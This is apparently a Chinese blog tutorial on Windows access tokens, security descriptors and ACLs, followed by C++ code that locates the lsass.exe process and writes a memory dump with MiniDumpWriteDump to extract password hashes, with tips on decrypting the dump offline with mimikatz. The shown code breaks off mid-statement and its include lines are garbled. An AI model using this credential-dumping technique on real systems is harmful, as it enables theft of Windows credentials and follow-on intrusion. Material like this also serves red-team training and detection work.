0x1 前置理论
访问令牌(Access Token)是描述进程或线程安全上下文的对象。它包含与进程或线程关联的用户账户的身份和权限信息。
访问令牌分为两种类型:授权令牌(Delegation Token)和模拟令牌(Impersonation Token)。
访问令牌包含以下信息:
- 用户账户的安全标识符(SID)
- 用户所属组的 SID
- 标识当前登录会话的登录 SID
- 用户或用户组拥有的权限列表
- 所有者 SID
- 主要组的 SID
- 用户在未指定安全描述符的情况下创建安全对象时系统使用的默认 DACL
- 访问令牌的来源
- 令牌是主要令牌还是模拟令牌
- 可选的限制 SID 列表
- 当前模拟级别
- 其他统计信息
授权令牌(Delegation Token)用于交互式会话登录(如本地用户登录、远程桌面等)。
模拟令牌(Impersonation Token)用于非交互式登录(如 net user、远程共享访问)。
当用户登录计算机后,会生成一个访问令牌。该令牌在用户创建进程或线程时会被复制一份,用于描述与该进程相关联的用户账户的安全上下文。默认情况下,当进程的线程与安全对象交互时,系统使用授权令牌。此外,线程可以模拟客户账户。模拟允许线程使用客户端的安全上下文与安全对象进行交互。模拟客户端的线程同时具有授权令牌和模拟令牌。当用户注销后,系统会将授权令牌转换为模拟令牌,并在重启系统后清除。
安全对象是可以拥有安全描述符的对象,所有命名的 Windows 对象都是安全对象。一些未命名的对象,例如进程和线程对象也可以拥有安全描述符。对于大多数的安全对象来说,我们可以在创建对象的函数调用中指定对象的安全描述符。
安全描述符包含与安全对象关联的安全信息。安全描述符由 SECURITY_DESCRIPTOR 结构及其关联的安全信息组成。安全描述符可以包括以下安全信息:
- 对象所有者和主要组的安全标识符(SID)
- 指定允许或拒绝特定用户或组的访问权限的 DACL
- 指定为对象生成审计记录的访问尝试类型的 SACL
- 一组控制位,用以限定安全描述符或其各个成员的含义
访问控制列表(Access Control Lists,ACL)是访问控制条目(ACE)的列表。ACL 中每个 ACE 都标示一个受托者,并为该受托者指定访问权限。安全对象的安全描述符可以包含两种类型的 ACL:DACL 和 SACL。
自由访问控制列表(DACL)标示允许或者拒绝访问安全对象的受托人。当进程试图访问安全对象时,系统会检查对象的 DACL 中的 ACE,以确定是否授予对它的访问权限。如果对象没有 DACL,系统会授予每个人 Full Access 权限。如果对象的 DACL 没有 ACE,系统将拒绝所有访问该对象的尝试,因为 DACL 中没有可以通过匹配的 ACE 条目。系统按顺序检查 ACE,直到它找到一个或多个允许所有请求的访问权限的 ACE,或者直到任何一个请求的访问权限被拒绝。
系统访问控制列表(SACL)使管理员能够记录访问受保护对象的尝试。每个 ACE 指定特定受托者进行的访问尝试的类型,这些访问尝试会导致系统在安全事件日志中生成记录。SACL 中的 ACE 可以在访问尝试失败和/或成功时生成审计记录。
受托人是应用访问控制条目(ACE)的用户账户、组账户或者登录会话。访问控制列表(ACL)中的每个 ACE 都有一个标示受托人的安全描述符(SID)。
根据前置知识,我们可以了解用户登录系统后创建进程、线程,程序访问安全对象时的权限情况。
当用户登录计算机,凭证验证通过后便会拿到一份访问令牌(Access Token)。该 Token 在我们创建进程或线程时会被使用,复制 explorer.exe 中的该用户的访问令牌到新的进程/线程中用以权限分配。
当程序访问安全对象时,安全对象会检测自身的 DACL。若 DACL 不存在,则对所有程序开放访问权限;若 DACL 存在,会按顺序查找 DACL 内的 ACL 与程序的访问令牌比较判断,判断其是否具有访问权限。
MiniDumpWriteDump 函数:
BOOL MiniDumpWriteDump(
[in] HANDLE hProcess,
[in] DWORD ProcessId,
[in] HANDLE hFile,
[in] MINIDUMP_TYPE DumpType,
[in] PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,
[in] PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
[in] PMINIDUMP_CALLBACK_INFORMATION CallbackParam);函数结构如上所示,可利用此函数将进程转储。本文将 Lsass.exe 转储用以提取 Hash。
0x2 实现代码:
#include#include #include #include #include #pragma comment(lib,"DbgHelp.lib") int main() { HANDLE LsassHandle = NULL; HANDLE OutFile = CreateFile(L"LSASS.DMP",GENERIC_WRITE|GENERIC_READ,0,NULL,CREATE_ALWAYS,NULL,NULL); DWORD PID; HANDLE Snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); PROCESSENTRY32 Entry; Entry.dwSize = sizeof(PROCESSENTRY32); LPWSTR ProcessName; //查找lsass进程pid if (Process32First(Snapshot, &Entry)) { ProcessName = Entry.szExeFile; PID = Entry.th32ProcessID; while (_wcsicmp(L"lsass.exe",ProcessName)!=0) { Process32Next(Snapshot, &Entry); ProcessName = Entry.szExeFile; PID = Entry.th32ProcessID; } std::cout
效果展示,另外,若在解密文件时出现ERROR kuhl_m_sekurlsa_acquireLSA ; Key import,可尝试低版本 mimikatz 离线解密。如 2.1.1 版本。
0x3 参考文章
